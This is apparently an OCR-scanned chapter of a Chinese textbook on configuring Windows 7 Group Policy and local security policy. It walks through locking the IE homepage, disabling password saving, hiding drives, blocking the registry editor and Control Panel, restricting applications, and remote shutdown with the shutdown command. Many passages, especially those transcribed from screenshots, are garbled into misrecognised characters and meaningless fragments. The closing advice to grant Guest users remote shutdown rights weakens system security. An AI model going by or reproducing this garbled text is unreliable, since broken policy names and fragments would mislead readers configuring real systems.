ms, a 因 从 "开始 1 菜单 公用 程序 组 未 村 
从 开始 1 菜单 中 及 除 “ 收 基 天 " 荣 单 未 本 
和 从 开始 菜单 中 用 除 “搜索 ” 术 接 未 可 置 
。 从 开始 荣 单 中 及 院 党 用 程序 列表 未 可 
从 开始 1 荣 单 中 给 除 “游戏 ” 氏 接 本寺 
{开始 1 菜单 中 量 除 “帮助 ”菜单 未 配置 





网 络 连 
从 了 开始 1 菜单 中 量 除 附加 的 程序 列表 未 配置 
不 保留 最 近 打开 文档 的 历史 未 配置 司 








阳 个 设 村 











文件 F) 操作 查看 WM) 帮助 00 
申 只 | 方 | 丰 | 对 | 日 加 | 季 


局 本 地 计算 机 第 略 
日 最 计算 机 配置 















































er “任务 栏 和 "开始 1 荣 要 
田 国 软件 设置 则 上 要 从 开始) 菜单 中 国际“ 图 片 "图标 古本 加 
田园 Windors 设置 不 搜索 通信 未 配置 

加 和 编辑 久 中 设置 “搜索 计算 机 ” 镜 接 未 村 

日 位置 " 可 
日 外 Ry 如 :se zo00 ene i 
田 国 Wndors 

- 不 搜索 Internet 未 可 置 
es 和 和 扫 雪 程序 和 栓 抽 面板 项 未 村 
人 办 时 有。 四 从 "设置 " 半 单 程序 


姑 人 J 开 “任务 1 





量 元 届 人 Tt 

田 | 

田园 网 络 Le 时 国 从 “天 好 ”和 中 “站 区” 拉 质 未 醒 轩 

田 国 系统 个 设置 阴 止 也 从 “开始 ”菜单 中 时 时 “TY 录像 ” 镑 接 不可 轩 

昌国 桌面 从 开始 1 荣 单 量 除 用 户 文件 去 未 隐 轩 
取 所 有 设置 从 “开始 ” 荣 单 中 用 jj 余 “ 视 频 ” 馆 接 未 配置 


强制 经 典 开始 」 菜单 未 配 团 
从 系统 通知 区 域 用 j 休 8 名 未 配置 
阻止 在 任务 栏 上 对 项 目 分 组 未 配置 
不 在 任务 栏 显示 任何 自 定义 工具 栏 未 本 吐 加 





和 六 RA/ 
后 不 妇 村 | i 








图 11-15 阻止 更 改 任务 栏 和 “开始 "菜单 


@ 将 “运行 ”命令 添加 到 “开始 ”菜单 (Windows 7)。Windows 7 的 “开始 ”菜单 默认 
没有 “运行 ”命令 ,非常 不 方便 。 利 用 组 策略 ,只 要 在 右 侧 窗 格 中 把 “将 “运行 ?命令 添加 到 
[开始 | 菜单 "策略 启用 即 可 ,如 图 11-17 所 示 。 

(3) IE 设置 。 微 软 的 Internet Explorer 让 人 们 可 以 轻松 地 在 互联 网 上 著 游 ,但 要 想 
用 好 Internet Explorer, 则 必须 将 它 配 置 好 。 很 多 病毒 、 木 马 和 恶意 代码 都 瞄准 了 IE, 因 
此 正 浏 览 器 的 安全 问题 不 容 忽 视 。 




















身 本 地 组 笔 咯 编辑 吾 









文件 F) 操作 WA) 查看 帮助 00 











和 哆 | 贞 国 | 芭 | 四 曾 | 昱 











局 本 地 计算 机 第 跑 
日 最 计算 机 配置 
田 国 软件 设置 
田 国 Yindows 设置 

















日 国 和 













上 “开始 " 芝 间 和 任务 栏 人 ge i 


Bs 

3 a a 

田 国 条 六 让 和 

轩 寺 9 gs i 开始 1 菜单 中 “ 收 基 天 " 荣 单 
















TEST 
系统 时 最近 打开 好 文档 的 历史 过 
户 省 最 近 的 程序 列表 未 本 村 
注销 ”添加 到 [开始 」 菜单 未 配置 
不 可用 的 Tindors Trstaller 程序 "开始! 如 单 快捷 




















八 Vindows 2000 












a 开始 1 对 单 中 有 条“ 搜索” 铺 未 本 是 


国 从 "开始 1 菜单 中 鹏 党 用 程序 列表 未 配置 

人 加 从 开始 荣 单 中 晴 杀 “游戏 ” 树 撞 未 配置 
和 “ 休 国 从 开始 1 菜单 中 了 “部 助 "菜单 未 配置 国 

aas 是 本 和 





[EE 








贞 本 地 组 策略 编辑 器 


图 11-16 阻止 关机 和 重新 启动 等 操作 
























到 本 地 计算 机 第 略 

日 量 计算 机 配置 
田 国 软件 设置 
田 国 Yindows 设置 


田园 Windows 设置 





日 国 Ed 本 













“运行 ”命令 添 加 到 "开始 ) 菜 也 
| 天 ， ”国耻 任务 人 上 对 天 自分 组 让 本 
不 在 任务 栏 呈 示 任何 自 定义 工具 不 可 时 
由 访问 任务 栏 89 上 下 文 荣 划 未 村 





编辑 访 跑 设置 


地 ww woe 






基 通 知 区 域 未 于 
从 开始! 菏 单 中 时 除 用 户 文件 夫 镑 换 未 配置 
了 开始 1 菜单 中 用 和 用 户 名 未 杏 置 
除 到 “Windovs Update” 的 檬 接 和 访问 未 醒 置 














图 11-17 在 “开始 "菜单 中 添加 “运行 "命令 


位 置 : 本 地 计算 机 策略 一 用 户 配 置 -管理 模板 Windows 组 件 一 Internet Explorer。 

QO@ 锁定 主页 。IE 浏览 器 的 主页 被 自 改 是 最 常见 的 ,而 利用 组 策略 锁定 后 ,就 可 以 彻 
底 解 决 这 一 问题 。 不 仅 不 会 再 弹出 乱七八糟 的 页 面 ,而 且 降 低 了 中 病毒 和 中 木马 的 概率 。 
在 右 侧 窗 格 中 双击 “禁用 更 改 主页 设置 "策略 项 ,如 图 11-18 所 示 。 在 打开 的 “禁用 更 改 主 
页 设置 "窗口 中 选择 “已 启用 ” 单 选 按 钮 ,然后 在 “选项 ”下 的 “主页 ”文本 框 中 输入 一 个 主页 
地 址 , 单 击 “ 确 定 ” 按 钮 ,如 图 11-19 所 示 。 启 用 此 策略 后 ,用 户 将 无 法 对 默认 主页 进行 设 
置 。 如 果 需 要 ,用 户 必须 在 修改 设置 前 指定 一 个 默认 主页 。 

@ 禁止 网 页 保存 密码 。 表 单 上 的 用 户 名 和 密码 的 自动 完成 功能 可 以 自动 保存 密码 ， 





国人 禁用 更 改 Internet 临时 文件 设置 
国 禁用 更 约 日 历 和 联系 人 设置 
要 求 - 国 禁用 更 次 证 书 设 轩 
Internet Explorer 5.0 及 以 上 版 本 。 加 禁用 更 交 昧 认 浏览 器 检查 
国 禁用 更 鸡 戎 色 设置 
用 更 交 连 接 设置 
国 禁 用 Internet 连接 向 导 
四 禁用 更 了 字体 设置 
I 固 禁用 表单 的 自动 完成 功能 
田力 性 crosoft 管理 控制 台 目 
田 国 Netleeting 


国 Windows Anytine Uperac 
国 Windows Instaler 





IIE 


名 
9 








图 11-19 指定 主页 


这 给 用 户 的 操作 带 来 了 方便 ,但 也 带 来 了 很 大 的 风险 ,如 果 不 希 望 自动 保存 密码 ,可 以 根 
据 下 列 步 骤 设 置 。 








| Co mg 和 版)] 


在 右 侧 窗 格 中 双击 “表单 上 的 用 户 名 和 密码 启用 自动 完成 "策略 项 ,在 打开 的 “表单 上 
的 用 户 名 和 密码 启用 自动 完成 ”对 话 框 中 选择 “已 禁用 ” 单 选 按钮 ,然后 单 击 “ 确 定 ” 按 钮 。 

@ 禁用 “高 级 ”选项 卡 。 在 “Internet 选项 ”对 话 框 中 的 “高 级 ”选项 卡 下 ,可 以 对 IE 安 
全 相关 的 许多 选项 进行 设置 .如 下 载 文件 等 。 如 果 这 里 的 设置 被 非法 用 户 更 改 , 可 能 会 导 
致 很 严重 的 后 果 。 因 此 ,如 果 计 算 机 中 有 重要 资料 ,又 需要 经 常 浏览 网 页 ,建议 禁用 更 改 
高 级 页 设置 。 展 开 “ 本 地 计算 机 策略 ”一 “用户 配 置 ">“ 管 理 模板 ”>“Windows 组 件 ” 一 
Internet Explorer 节点 ,在 右 侧 窗 格 中 双击 “禁用 更 改 高 级 页 设置 "策略 项 ,在 打开 的 “ 禁 
用 更 改 高 级 页 设置 "对话 框 中 选中 “已 启用 ” 单 选 按 钮 ,然后 单 击 “确定 ”按钮 。 

@ 禁用 “在 新 窗口 中 打开 ”菜单 项 。 出 于 对 安全 的 考虑 ,有 时 候 有 必要 屏蔽 下 的 一 
些 功 能 菜单 ,组 策略 提供 了 丰富 的 设置 项 目 , 如 禁用 “在 新 窗口 中 打开 ”菜单 项 。 展 开 “ 本 
地 计算 机 策略 ”一 “用 户 配 置 ” 一 “管理 模板 ”>“Windows 组 件 ” 一 Internet Explorer 一 “ 浏 
览 器 菜单 ”节点 ,然后 双击 “禁用 “在 新 窗口 中 打开 ?菜单 选项 "策略 项 并 设置 为 “已 启用 ”， 
如 图 11-20 所 示 。 



















BEDE LE 





查看 
和 路 | 页 四 | | 四 加 | 昱 



























禁用 “在 新 窗口 中 打开 ” 莱 单 选项 
编辑 第 瞎 设 置 





其 用 关闭 浏 此 器 和 


ze Explorer 5.0 及 以 上 版 本 






管理 模板 sn | 发 送 反馈 意 ! 

| “开始 ” RE 本 六 a 用 

日 Windows 组 示 ” 

Se 和 
田 国 Internet 控 和 









田 国 Internet 设置 


I 


与“; 

站 
| 
法 章 - 当 | F “在 新 窗口 
和 

ER 医 i 
图 11-20 ”禁用 “在 新 窗口 中 打开 ”菜单 项 

该 策略 后 ,用 户 在 某 个 链接 上 右 击 ,然后 单 击 “ 在 新 窗口 中 打开 ”时 ,系统 将 提示 
“本 次 操作 由 于 这 台 计 算 机 的 限制 而 被 取消 。 请 与 你 的 系统 管理 员 联 系 ”。 该 策略 可 与 
““ 文 件 ' 菜 单 : 禁用 “新 建 菜 单 选项 ”一 起 使 用 ,如 图 11-21 所 示 。 启 用 该 策略 后 ,选择 
“在 新 窗口 中 打开 ”命令 .将 无 法 在 新 窗口 中 打开 链接 ,系统 会 提示 用 户 该 命令 无 效 ,网 页 
自动 打开 的 窗口 也 全 部 被 禁止 ,这样 也 可 达到 屏蔽 弹出 广告 窗口 的 效果 。 

@ 禁用 “Internet 选项 设置。 如果 不 希望 别人 对 IE 浏览 器 的 设置 随意 更 改 , 可 以 展 


开 “ 本 地 计算 机 策略 ”一 “用 户 配 置 " 一 “管理 模板 ”一 “Windows 组 件 ” 一 Internet Explorer->~ 
“浏览 器 菜单 "节点 ,然后 将 右 侧 窗 口 的 “工具 "菜单 : 禁用 “Internet 选项 "菜单 选项 策略 


查看 " 菜单 : 禁用 “全屏 显示 "3 
看 ”菜单 : 茜 用 “ 源 文件 ” 菜 上 
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启用 ,如 图 11-22 所 示 。 当 用 户 选 择 下 浏览 器 的 “Internet 选项 "命令 时 会 提示 失效 。 
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文件 F) 操作 查看 WV) 帮助 00 
和 四 | 为 | 看 | 马 | 日本 | 多 
本 本 地 计算 机 年 四 
日 路 计算 机 配置 
国 软件 设置 
田 国 Windows 设置 
































六 禁用 “新 建 ” 莱 单 


| 





编辑 禾 连 设置 





“文件 " 革 单 : 用 “ 打开 菜单 选项 
“帮助 ” 菜单， 出 禾 “ 发 送 反 油 意 见 ” 
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图 11-21 禁用 “新 建 " 菜 单项 
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图 11-22 禁用 “Internet 选项 ”菜单 项 
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禁用 “Internet 选项 ”对 话 框 中 的 某 个 选项 卡 。 展 开 “ 本 地 计算 机 策略 ”>“ 用 户 配 
置 " 一 “管理 模板 ”一 “Windows 组 件 ” 一 Internet Explorer 习 “Internet 控制 面板 ”节点 ,在 
右边 窗 格 中 可 以 看 到 “禁用 高 级 页 “禁用 连接 页 “禁用 内 容 页 ”禁用 常规 页 ”禁用 隐私 
页 “禁用 程序 页 “禁用 安全 页 ”等 项 目 。 下 面 以 “禁用 常规 页 ”为 例 进 行 说 明 。 

双击 右边 窗 格 中 的 “禁用 常规 页 ”选项 并 启用 该 策略 ( 见 图 11-23), 则 当 再 打开 
Internet 选项 控制 面板 ,会 发 现 “ 常 规 ” 选 项 卡 已 经 没有 了 ,这 样 一 来 用 户 将 无 法 看 到 和 更 
改 主页 ,浏览 历 史记 录 、 网 页 外 观 以 及 辅助 功能 的 设置 。 同 理 可 以 禁用 “安全 ”隐私 “内 
容 ” 等 其 他 选项 卡 。 


局 本 地 组 第 四 编 辑 吕 
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图 11-23 禁用 “常规 ”选项 卡 
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(4) Windows 高 级 功能 设置 。 

QO@ 隐藏 “我 的 电脑 "中 指定 的 驱动 器 。 启 用 此 组 策略 可 以 从 “我 的 电脑 "和 Windows 
资源 管理 器 中 删除 代表 所 选 硬件 驱动 器 的 图 标 。 并 且 驱 动 器 号 代表 的 所 有 驱动 器 不 出 现 
在 标准 的 “打开 ”对 话 框 中 。 

展开 “本 地 计算 机 策略 ”>“ 用 户 配置 "一 “管理 模板 ”>“Windows 组件 ”Windows 
资源 管理 器 ”节点 ,双击 “隐藏 “我 的 电脑 ”中 的 这 些 指定 的 驱动 器 ?选项 并 启用 此 策略 ,如 
图 11-24 所 示 。 弹 出 “隐藏 “我 的 电脑 中 的 这 些 指定 的 驱动 器 ”对 话 框 ,在 下 面 的 列表 框 
中 选择 一 个 驱动 器 或 几 个 驱动 器 进行 隐藏 设置 ,如 图 11-25 所 示 。 

注意 : 这 项 策略 只 隐藏 驱动 器 图 标 , 用 户 仍 可 通过 使 用 其 他 方式 继续 访问 驱动 器 的 
内 容 。 

@ 防止 从 * 我 的 电脑 ?访问 驱动 器 。 此 策略 让 用 户 无 法 查看 在 “我 的 电脑 ?或 
Windows 资源 管理 器 中 所 选 驱动 器 的 内 容 。 同 时 它 也 禁止 使 用 “运行 ”对 话 框 “映像 网 
络 驱动 器 ”对 话 框 或 dir 命令 查看 在 这 些 驱 动 器 上 的 目录 。 

展开 “本 地 计算 机 策略 ”>“ 用 户 配 置 ">“ 管 理 模 板 ”>“Windows 组 件 ”>“Windows 资 
源 管理 器 ”节点 ,在 右边 窗 格 中 双击 “防止 从 “我 的 电脑 访问 驱动 器 ”选项 并 启用 此 策略 ,如 
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图 11-26 所 示 。 
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和 窗口 动画 


动 中 心 中 的 这 些 图 关闭 常用 控件 ; 
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图 11-26 阻止 访问 磁盘 


注意 : 这 些 代表 指定 驱动 器 的 图 标 仍旧 会 出 现在 “我 的 电脑 ”中 ,但 是 如 果 用 户 双击 
图 标 ,会 出 现 一 条 消息 提示 已 设置 防止 这 一 操作 。 这 些 设置 不 会 防止 用 户 使 用 其 他 程序 
访问 本 地 和 网 络 驱 动 器 。 

@ 禁止 使 用 “文件 夹 选项 "命令 。 在 Windows 7 操作 系统 中 ,“ 文 件 夹 选项 ”功能 是 比 
较 常用 的 功能 之 一 。 使 用 “文件 夹 选项 ”功能 ,用 户 可 以 查看 隐藏 在 计算 机 中 的 文件 ,设置 
文件 夹 窗口 的 打开 方式 以 及 其 他 许多 有 关 文 件 夹 选 项 的 设置 。 如 果 用 户 不 希望 其 他 用 户 
更 改 自己 在 计算 机 中 的 各 项 设置 ,可 以 将 该 功能 禁用 。 

打开 “本 地 组 策略 编辑 器 "窗口 ,然后 在 左边 窗 格 中 展开 * 用 户 配 置 "一 “管理 模板 ”一 
“Windows 组件 ”一 "Windows 资源 管理 器 ?节点 ,用 户 可 以 在 右边 窗 格 中 看 到 “从 “工具 ” 
菜单 删除 “文件 夹 选 项 菜单 选项 ”, 如 图 11-27 所 示 。 

启用 该 策略 后 , 当 用 户 再 在 窗口 中 打开 “组 织 ” 菜 单 时 ,会 发 现 “ 文 件 夹 和 搜索 选项 " 菜 
单项 已 经 变 成 灰色 。 如 果 用 户 想 要 重新 使 用 “文件 夹 选 项 ”功能 ,可 以 将 该 策略 重新 设置 
为 “未 配置 "或 者 “已 禁用 ” 即 可 。 

@ 防止 搜索 泄露 隐私 。 快 速 搜索 框 是 Windows 7 的 一 大 特色 ,尤其 在 执行 文件 夹 搜 
索 时 非常 方便 。 不 过 这 一 功能 有 时 也 特别 令 人 篮 傣 , 那 就 是 会 自动 保存 所 有 历史 搜索 ,并 
且 没 有 提供 清除 功能 ,其 中 一 些 隐私 内 容 就 会 暴露 出 来 。 使 用 组 策略 随时 清空 搜索 历史 

一 个 很 好 的 补救 措施 ,具体 操作 步骤 如 下 。 
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国 winaovs 日 历 “我 8 中 脑 ” 量 除 共享 文档 
除 “映射 网 络 驱 动 器 ”和 “ 疡 开 网 络 3 
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图 11-27 禁用 “文件 夹 选 项 ”功能 


打开 “本 地 组 策略 编辑 器 "窗口 ,然后 在 左边 窗 格 中 展开 * 用 户 配 置 ” 一 “管理 模板 ”一 
“Windows 组 件 ”>“Windows 资源 管理 器 ”节点 ,在 右边 窗 格 中 双击 “在 Windows 资源 管 
理 器 搜索 框 中 关闭 最 近 搜 索 条 目的 显示 ”选项 ,如 图 11-28 所 示 。 在 打开 的 “在 Windows 
资源 管理 器 搜索 框 中 关闭 最 近 搜 索 条 目的 显示 ?窗口 中 ,选择 “已 启用 ? 单 选 按钮 ,然后 单 
击 “ 确 定 ” 按 钮 。 

@ 禁止 光盘 自动 播放 。 光 盘 自动 播放 虽然 能 给 用 户 带 来 便利 ,但 有 时 也 会 带 来 不 少 
麻烦 。 默 认 情 况 下 ,将 光盘 插入 光驱 ,系统 就 会 自动 读 取 光 盘 , 并 启动 autorun. inf 文件 中 
指定 的 应 用 程序 。 这 一 默认 状态 对 系统 来 说 非常 不 安全 ,说 不 定 自动 运行 的 是 一 个 木马 
程序 。 用 组 策略 可 以 关闭 光盘 自动 播放 功能 ,具体 操作 步骤 如 下 。 

打开 “本 地 组 策略 编辑 器 ”窗口 ,在 左边 窗 格 中 展开 “用 户 配 置 " 一 “管理 模板 ”一 
“Windows 组 件 ”>“ 自 动 播放 策略 ”节点 ,在 右边 窗 格 中 双击 “关闭 自动 播放 ”选项 ,在 打 
开 的 “关闭 自动 播放 ”窗口 中 选择 “已 启用 ” 单 选 按 钮 ,然后 在 “选项 ”选项 组 的 “关闭 自动 播 
放 ” 下 拉 列 表 框 中 选择 “CD-ROM 和 可 移动 介质 驱动 器 "或 “所 有 了 驱动 器 "选项 , 单 击 “ 确 
定 ” 按 钮 。 

注意 : 插入 光盘 时 按 住 Shift 键 可 禁止 光盘 自动 播放 。 这 种 方式 最 好 能 成 为 使 用 陌 
生 光 盘 时 的 一 种 操作 习惯 。 另 外 ,此 设置 不 阻止 自动 播放 音乐 CD。 

防止 访问 控制 面板 。 控 制 面板 是 Windows 最 重要 的 组 件 之 一 。 下 面 介绍 如 何在 
组 策略 中 设置 禁止 访问 控制 面板 ,具体 的 操作 步骤 如 下 。 
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图 11-28 防止 搜索 泄露 隐私 








打开 “本 地 组 策略 编辑 器 "窗口 ,然后 在 左边 窗 格 中 展开 “用 户 配置 >“ 管理 模板 ”一 
“控制 面板 ”节点 ,在 右边 窗 格 中 双击 “禁止 访问 “控制 面板 '” 选 项 ,如 图 11-29 所 示 。 在 打 
开 的 对 话 框 中 选择 “已 启用 ” 单 选 按钮 ,然后 单 击 “ 应 用 ”和 “确定 ”按钮 。 这 样 , 当 用 户 再 次 
打开 “开始 "菜单 时 ,就 会 发 现 其 中 已 经 没有 了 “控制 面板 ”菜单 项 。 如 果 用 户 想 要 重新 使 
用 控制 面板 ,可 以 在 上 述 操作 的 同一 目录 下 ,将 “禁止 访问 控制 面板 ”选项 设置 为 “未 配置 ” 
或 者 “已 禁用 ”。 

@ 禁止 使 用 注册 表 编 辑 器 。 打 开 * 本 地 组 策略 编辑 器 ”窗口 ,在 左边 窗 格 中 展开 “用 
户 配置 ”管理 模板 ”~ 系统 ”节点 ,在 右边 窗 格 中 双击 “阻止 访问 注册 表 编 辑 工具 ”选项 
并 启用 该 策略 ,如 图 11-30 所 示 。 

当 用 户 试 图 执行 regedit 命令 时 ,会 提示 “注册 编辑 已 被 管理 员 停 用 ”。 

@@ 限制 可 以 使 用 的 应 用 程序 。 有 时 用 户 所 使 用 的 计算 机 并 非 一 人 专用 ,而 是 多 个 人 
共用 的 ,但 是 这 些 使 用 者 在 计算 机 中 的 权限 却 不 一 样 , 有 的 是 管理 员 账 户 , 有 的 是 标准 账 
户 , 有 的 则 使 用 Guest 账户 。 此 时 ,管理 员 用 户 可 以 为 其 他 用 户 设 置 可 以 使 用 的 应 用 程 
序 ,具体 操作 步骤 如 下 。 

打开 “本 地 组 策略 编辑 器 "窗口 ,在 左边 窗 格 中 展开 “用 户 配 置 " 一 “管理 模板 ”一 
统 ” 节 点 ,双击 “只 运行 指定 的 Windows 应 用 程序 ?选项 并 启用 该 策略 ,如 图 11-31 eg 
输入 想 要 设置 为 允许 运行 的 应 用 程序 ,例如 输入 cmd. exe, 设 置 命令 提示 符 为 允许 运行 的 
应 用 程序 。 另 外 ,用 户 还 可 以 在 右边 窗 格 中 双击 “不 要 运行 指定 的 Windows 应 用 程序 ” 选 
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图 11-29 ”禁止 访问 控制 面板 
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图 11-30 ”阻止 访问 注册 表 编 辑 工具 


项 并 启用 该 策略 ,如 图 11-32 所 示 。 输 入 想 要 设置 为 不 允许 运行 的 应 用 程序 ,例如 输入 
notepad. exe, 设 置 记事 本 为 不 允许 运行 的 应 用 程序 。 


亿 44 任务 4 系统 的 安全 管理 
1. 任务 目标 


安全 是 计算 机 用 户 所 不 能 忽视 的 一 个 方面 。 设 置 完 善 的 安全 策略 对 于 维护 计算 机 系 
统 的 安全 是 很 重要 的 。 系 统 安全 是 至 关 重 要 的 , 它 决 定 了 计算 机 能 否 处 于 一 个 稳定 且 安 
全 可 靠 的 环境 中 ,而 且 直 接 影响 着 用 户 的 利益 能 和 否 得 到 有 效 的 保障 。 一 些 网 络 攻击 者 常 
常会 利用 用 户 计 算 机 中 的 漏洞 进行 窃取 和 破坏 活动 ,从 而 给 用 户 带 来 不 必要 的 损失 。 在 
与 本 地 安全 策略 有 关 的 策略 选项 中 ,有 一 些 是 与 系统 安全 紧密 相关 的 ,对 这 些 策略 选项 进 
行 适当 的 设置 ,能够 更 好 地 维护 计算 机 系统 的 安全 。 
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图 11-31 只 运行 指定 的 Windows 应 用 程序 
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图 11-32 不 要 运行 指定 的 Windows 应 用 程序 
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2. 工作 任务 


(1) 禁止 在 登录 前 关机 。 

(2) 不 显示 最 后 登录 的 用 户 名 。 

(3) 记录 上 次 登录 系统 的 时 间 。 

(4) 禁止 修改 系统 还 原配 置 。 

(5) 在 Windwos 7 中 实现 远程 关机 。 


3. 工作 环境 
一 台 预 装 Windows 7 系统 的 主机 。 
4. 实施 过 程 


(1) 禁止 在 登录 前 关机 。 该 策略 用 来 确定 是 否 无 须 登 录 系 统 便 可 关闭 计算 机 。 启 用 
此 策略 时 ,在 Windows 登录 屏幕 上 的 “关机 ”命令 可 用 。 禁 用 此 策略 时 ,用 户 必 须 能 够 成 
功 登 录 到 计算 机 并 具有 关闭 系统 的 用 户 权 限 ,才能 够 执行 系统 关闭 操作 。 具 体操 作 步 又 
如 下 。 

在 Windows 7 中 , 按 Win 十 R 组 合 键 ,弹出 “运行 ”对话 框 ,然后 输入 secpol. msec 命 
令 , 按 Enter 键 打开 “本 地 安全 策略 ”窗口 ,然后 在 左边 窗 格 中 展开 “安全 设置 "一 “本 地 策 
咯 ”>“ 安 全 选项 "节点 ,在 右边 窗 格 中 找到 “关机 : 允许 系统 在 未 登录 的 情况 下 关闭 ” 选 
项 ,如 图 11-33 所 示 。 











使 用 安全 措 述 符 定义 语言 SDDL) 语 法 的 计算 机 启动 限制 没有 定义 
ft 网 络 服务 器 : 登录 时 间 过 期 后 断 开 与 客户 油 的 这 接 已 启用 
ft 网 络 服务 器 : 对 通信 进行 数字 签名 如 果 客 户 油 用 





图 11-33 人 允许 在 未 登录 的 情况 下 关机 


双击 打开 其 属性 对 话 框 ,选择 “已 启用 ” 单 选 按钮 ,然后 单 击 “ 应 用 ”或 “确认 ”按钮 。 通 
常情 况 下 ,作为 服务 器 的 计算 机 是 否 能 够 运行 正常 .不 受到 恶意 攻击 和 不 中 途 关机 等 ,对 
于 局 域 网 起 着 至 关 重 要 的 作用 ,因此 应 该 将 该 策略 选项 设置 为 “已 禁用 ”。 而 对 于 终端 计 
算 机 来 说 ,不 需要 保证 计算 机 一 直 都 处 于 开机 状态 ,如 果 用 户 开机 后 不 想 登 录 计 算 机 了 ， 
可 在 登录 界面 直接 单 击 “ 关 机 ”按钮 。 
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(2) 不 显示 最 后 登录 的 用 户 名 。 该 策略 用 来 确定 是 否 将 上 次 登录 到 系统 中 的 用 户 名 
显示 在 Windows 登录 界面 中 。 在 很 多 情况 下 .这 一 功能 的 设置 方便 了 用 户 登录 系统 , 然 
而 ,也 为 其 他 非法 用 户 侵 犯 用 户 隐私 带 来 了 危险 。 如 果 启 用 该 策略 选项 , 则 上 次 成 功 登录 
的 用 户 的 名 称 将 不 显示 在 登录 界面 中 ; 如 果 禁 用 该 策略 选项 , 则 在 Windows 登录 界面 中 
会 显示 上 次 登录 的 用 户 名 。 具 体 的 操作 步骤 如 下 。 

@ 在 Windows 7 中 , 按 Win 十 R 组 合 键 ,弹出 “运行 "对 话 框 ,然后 输入 secpol. msc 
命令 , 按 Enter 键 打开 “本 地 安全 策略 "窗口 。 

@ 在 左边 窗 格 中 展开 “安全 设置 ”>“ 本 地 策略 ”一 “安全 选项 ”节点 。 

@ 在 右边 窗 格 中 找到 “交互 式 登录 : 不 显示 最 后 的 用 户 名 ”选项 ,如 图 11-34 所 示 。 
双击 打开 其 属性 对 话 框 ,选择 “已 启用 ” 单 选 按钮 ,然后 单 击 “ 应 用 ”或 确认” 按钮。 注意 ， 
当 启 用 了 该 策略 选项 之 后 ,用 户 再 次 登录 系统 时 ,必须 输入 用 户 名 和 密码 。 
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图 11-34 不 显示 最 后 的 用 户 名 


(3) 记录 上 次 登录 系统 的 时 间 。Windows 7 具有 记录 系统 登录 信息 的 功能 ,这 样 每 
次 登录 系统 时 就 可 以 将 前 后 两 次 登录 的 时 间 加 以 对 比 , 如 果 发 现时 间 不 一 致 , 就 说 明 有 人 
曾经 试图 非法 使 用 过 你 的 账号 进行 登录 。 

打开 “本 地 组 策略 编辑 器 "窗口 ,在 左边 窗 格 中 展开 “计算 机 配置 "一 “管理 模板 ”一 
“Windows 组 件 ”>“Windows 登录 选项 ”节点 ,在 右边 窗 格 中 双击 “在 用 户 登录 期 间 显示 
有 关 以 前 登录 的 信息 ”选项 ,在 打开 的 “在 用 户 登 录 期 间 显 示 有 关 以 前 登录 的 信息 "窗口 中 
选择 “已 启用 ” 单 选 按 钮 , 单 击 “ 确 定 ” 按 钮 。 这 样 ,下 次 启动 计算 机 时 ,Windows 7 就 会 在 
用 户 进 入 系统 桌面 前 提示 你 上 次 登录 的 时 间 。 

(4) 禁止 修改 系统 还 原配 置 。“ 系 统 还 原 ” 是 Windows 中 一 项 很 重要 的 功能 。 为 了 
保证 系统 的 可 操作 性 ,将 “系统 还 原 ” 所 占用 的 磁盘 空间 设置 得 大 一 些 是 很 有 必要 的 。 但 
如 果 这 个 设置 被 人 更 改 , 就 会 造成 以 前 创建 的 还 原点 中 信息 的 丢失 。 在 组 策略 中 禁止 对 
“系统 还 原 ” 的 配置 进行 修改 的 方法 如 下 。 
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@ 打开 “本 地 组 策略 编辑 器 "窗口 。 
@ 在 左边 窗 格 中 展开 “计算 机 配置 "一 “管理 模板 ”>“ 系 统 ”>“ 系 统 还 原 ” 节 点 ,然后 
在 右 侧 窗 格 中 双击 “关闭 配置 "策略 项 ,如 图 11-35 所 示 。 
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图 11-35 关闭 系统 还 原配 置 


@ 在 打开 的 “关闭 配置 ?窗口 中 选择 "已 启用 ” 单 选 按钮 ,然后 单 击 “确定 ”按钮 ,如 
图 11-36 所 示 。 

@ 重启 计算 机 后 设置 就 会 生效 ,此 时 “系统 还 原 ” 配 置 界面 上 配置 系统 还 原 的 选项 就 
会 消失 。 

(5) 在 Windows 7 中 实现 远程 关机 。 在 Windows 7 中 使 用 shutdown 命令 可 以 关 
闭 、 重 新 启动 本 地 或 远程 计算 机 。 利 用 它 不 但 可 以 注销 用 户 、 关 闭 或 重新 启动 计算 机 ,还 
可 以 实现 定时 关机 远程 关机 。 该 命令 的 语法 格式 如 图 11-37 所 示 。 下 面 是 该 命令 的 一 


些 基本 用 法 。 
QO 注销 当前 用 户 ,使 用 命令 shutdown -1, 该 命令 只 能 注销 本 机 用 户 , 对 远程 计算 机 
不 适用 。 


@ 关闭 本 地 计算 机 ,使 用 命令 shutdown -s。 
@ 重启 本 地 计算 机 ,使 用 命令 shutdown -r。 
@ 定时 关机 ,使 用 命令 shutdown -s -t 30 可 指定 在 30 秒 之 后 自动 关闭 计算 机 。 使 
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图 11-36 “关闭 配置 "窗口 
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11-37 ”shutdown 命令 使 用 帮助 


ER [ 项 目 11 组 策略 的 设置 ] (> 


用 命令 at 23:00 shutdown -s 指定 计算 机 在 晚上 11 点 准时 关机 。 

@ 中 止 计算 机 的 关闭 ,有 时 在 设 定 了 计算 机 定时 关机 后 ,如 果 出 于 某 种 原因 又 想 取 
消 这 次 关机 操作 ,就 可 以 用 shutdown -a 来 中 止 。 

使 用 图 形 界面 设置 关机 ,shutdown 命令 也 可 以 用 图 形 界面 进行 设置 ,在 命令 行 窗 
口 输入 shutdown -i, 按 Enter 键 后 会 弹出 “远程 关机 对 话 框 ”对 话 框 ,如 图 11-38 所 示 ,可 
以 根据 需要 进行 设置 。 


远程 关机 对 话 框 了 xx| 


| | 
EE 


vy 


vy 








图 11-38 “远程 关机 对 话 框 ”对话 框 


该 命令 的 参数 -m \\Computer 可 以 指定 将 要 关闭 或 重启 的 计算 机 , 若 省 略 的 话 则 默 
认为 对 本 机 操作 。 

例如 ,在 30 秒 内 关闭 远程 装 有 Windows 7 系统 的 计算 机 ,其 IP 地 址 为 192. 168. 5.2, 可 
使 用 如 下 命令 。 


shutdown —s —m\\192.168.5.2 -t+ 30 


如 果 该 命令 执行 后 ,远程 计算 机 一 点 反应 都 没有 ,屏幕 上 提示 “拒绝 访问 ”, 则 是 因为 
系统 权限 不 够 。 因 为 Windows 7 默认 的 安全 策略 中 ,只 有 管理 员 组 的 用 户 才 有 权 从 远 端 
关闭 计算 机 ,而 一 般 情况 下 从 局 域 网 内 的 其 他 计算 机 访问 该 计算 机 时 , 则 只 有 Guest 用 户 
权限 ,所 以 当 执 行 上 述 命 令 时 , 便 会 出 现 “ 拒 绝 访问 "的 情况 。 而 利用 组 策略 即 可 赋予 
Guest 用 户 远 程 关 机 的 权限 。 

